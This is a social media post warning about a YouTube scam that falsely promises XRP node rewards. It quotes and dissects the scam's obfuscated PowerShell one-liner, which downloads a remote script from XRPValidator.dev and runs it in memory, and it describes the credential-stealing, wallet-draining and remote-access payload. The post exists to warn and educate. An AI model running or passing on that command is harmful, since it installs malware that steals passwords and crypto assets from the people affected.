Good morning everybody!

Earlier yesterday morning I was doing some research on Nostr and Primal as I am new to the platform

I went to YouTube to search for videos and walkthroughs like normal.

I came across this profile which I took a screenshot and attached. Yes I reported this to the YouTube team and to Google.

Below I will cover what I found, TLDR at the bottom.

This is 100% a scam. The technical reality of the XRP Ledger (XRPL) is that validators are not paid. Anyone claiming you can “mine” or earn “daily rewards” by running a node is lying to install malware on your system.

Here is exactly how this social engineering trick works and why you should never “copy-paste” commands from the internet, even from convincing “expert” videos.

1. The Hook: “Passive Income” The video uses high-quality production, quotes Satoshi Nakamoto, and shows fake dashboards of “daily rewards.”

The Lie: “Run an XRP node and get paid XRP every day.”

The Truth: The XRP Ledger does not pay validators. Running a node is a voluntary contribution. Any promise of “mining” XRP is a red flag, XRP is pre-mined; no new coins can be created.

2. The Weapon: The PowerShell “One-Liner” The video asks you to paste this command into your terminal: DONT DO THIS!!!

powershell -command “$Blockchain=‘XRP’; \(NodeType='Validator'; Invoke-RestMethod (\)Blockchain + $NodeType + ‘.’ + ‘dev’) | Invoke-Expression; …”

Why this is dangerous:

• Obfuscation: By splitting “XRP” and “Validator,” the script tries to hide the target URL (XRPValidator.dev) from basic security filters.

• Fileless Execution: Invoke-RestMethod downloads a malicious script from the attacker’s server, and Invoke-Expression (IEX) runs it directly in your RAM. It never touches your hard drive as a .exe, making it invisible to many standard antivirus programs.

• The “ClickFix” Strategy: Attackers know that if they give you a “quick fix” or an “easy setup,” you’re less likely to scrutinize the code.

3. The Payload: What happens if you hit Enter? If you run that command, you aren’t a validator; you’re a victim. The script typically:

• Steals your Identity: Scrapes browser cookies and saved passwords.

• Drains your Wallets: Searches your files for “seed phrases” or “private keys.”

• Installs a RAT: Sets up a “Remote Access Trojan” that gives the attacker full control over your mouse, keyboard, and webcam.

Spread the word: In crypto and cybersecurity, if it’s “one click away from easy money,” it’s usually one click away from a complete system compromise.

#CyberSecurity #Infosec #EthicalHacking #XRP #ScamAlert #Nostr

TLDR:

Bad internet shaman say smash one-click PowerShell rune to get free XRP crypto-meat.

XRP cannot be mined, and protocol no pay node runners. Shaman speak fake voodoo.

Rune break words apart to sneak past tribal guard dogs (antivirus) and hide evil sky-cave address (XRPValidator[.]dev).

You hit enter, ghost enter RAM. It no install node; it steal your passwords, drain coin sack, and take over whole cave (RAT).

STAYWIRED!!